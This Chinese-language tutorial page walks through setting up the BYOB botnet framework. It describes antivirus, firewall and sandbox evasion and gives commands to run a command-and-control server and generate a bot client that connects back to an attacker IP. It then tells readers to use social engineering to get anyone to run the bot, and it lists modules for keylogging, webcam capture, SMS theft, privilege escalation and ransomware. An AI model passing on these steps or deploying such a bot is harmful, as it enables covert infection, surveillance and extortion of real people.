构建你自己的僵尸网络

BYOB 为安全研究人员和开发者提供了一个框架,用于构建和操作一个基本的僵尸网络,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的理解,从而提高他们开发针对这些威胁的对策的能力。它的设计允许开发者轻松地实现他们自己的代码并添加酷炫的新功能,而无需从头开始编写远程管理工具 (RAT) 或指挥控制服务器。

特性

  • 不写入磁盘 − 客户端从不向磁盘写入任何内容 - 甚至不是临时文件,因为远程导入允许将任意代码动态加载到内存中,并直接导入到当前正在运行的进程中。

  • 平台无关性 − 所有内容都使用 Python 编写,生成的客户端可以选择编译成可移植可执行文件 (Windows) 或捆绑到独立应用程序中。

  • 绕过防火墙 − 客户端通过反向 TCP 连接连接到命令和控制服务器,这将绕过大多数防火墙,因为默认过滤器配置主要阻止传入连接。

  • 针对反病毒软件的对策 − 通过阻止名称为已知反病毒产品进程的生成来避免被反病毒软件分析。

  • 加密有效负载以防止分析 − 主客户端有效负载使用仅存在于与其一起生成的有效负载暂存器中的随机 256 位密钥进行加密。

  • 防止逆向工程 − 默认情况下,如果检测到虚拟机或沙箱,客户端将中止执行。

如何安装

  • git clone https://github.com/malwaredllc/byob.git

  • cd byob

  • pip install -r requirements.txt

  • python setup.py

    这里将使用两个终端;第一个终端将是僵尸网络服务器,用于处理会话;第二个终端将是僵尸网络客户端,用于创建僵尸。

  • python server.py –port 445

    然后打开另一个 Linux 终端并输入 cd /home/cybersecurity/Downloads/byob/byob

  • python client.py –name testbot.py 192.168.1.10(攻击者IP) 445

执行上述查询后,将创建一个新的僵尸网络。上述查询将执行。现在,您可以使用任何社会工程技巧让任何人打开他们计算机中的僵尸程序。当 testbot.py 在目标机器上执行时,将在僵尸网络服务器中创建一个会话。

漏洞利用后

在受害者成功配置僵尸网络后,客户端可以远程导入这些漏洞利用后模块。

  • 键盘记录器 (byob.modules.keylogger): 记录用户的按键和输入的窗口名称

  • 屏幕截图 (byob.modules.screenshot): 拍摄当前用户的桌面屏幕截图

  • 网络摄像头 (byob.modules.webcam): 查看实时流或从网络摄像头捕获图像/视频

  • 勒索软件 (byob.modules.ransom): 加密文件并为赎金支付生成随机 BTC 钱包

  • 数据包嗅探器 (byob.modules.packetsniffer): 在主机网络上运行数据包嗅探器并上传 .pcap 文件

  • 持久性 (byob.modules.persistence): 在主机上建立持久性

  • 手机 (byob.modules.phone): 读取/搜索/上传来自客户端智能手机的短信

  • 提升权限 (byob.modules.escalate): 尝试绕过 UAC 以获得未经授权的管理员权限

  • 端口扫描器 (byob.modules.portscanner): 扫描本地网络以查找其他在线设备和开放端口

  • 进程控制 (byob.modules.process): 列出/搜索/终止/监视主机上当前运行的进程

更新于:2020年9月29日

8K+ 次浏览

启动你的 职业生涯

通过完成课程获得认证

开始
广告
© . All rights reserved.